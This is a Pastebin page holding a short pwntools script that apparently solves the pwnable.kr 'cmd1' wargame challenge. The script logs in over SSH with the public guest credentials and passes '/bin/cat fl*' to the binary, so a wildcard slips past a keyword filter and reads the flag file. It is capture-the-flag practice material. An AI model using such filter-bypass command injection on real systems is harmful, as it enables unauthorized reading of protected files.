Advertisement
Guest User

Untitled

a guest
Dec 11th, 2016
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.16 KB | None | 0 0
  1. from pwn import *
  2. sh = ssh(host='pwnable.kr', user='cmd1', password='guest', port=2222)
  3. proc = sh.process(['/home/cmd1/cmd1', '/bin/cat fl*'])
  4. print proc.recv(1024)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement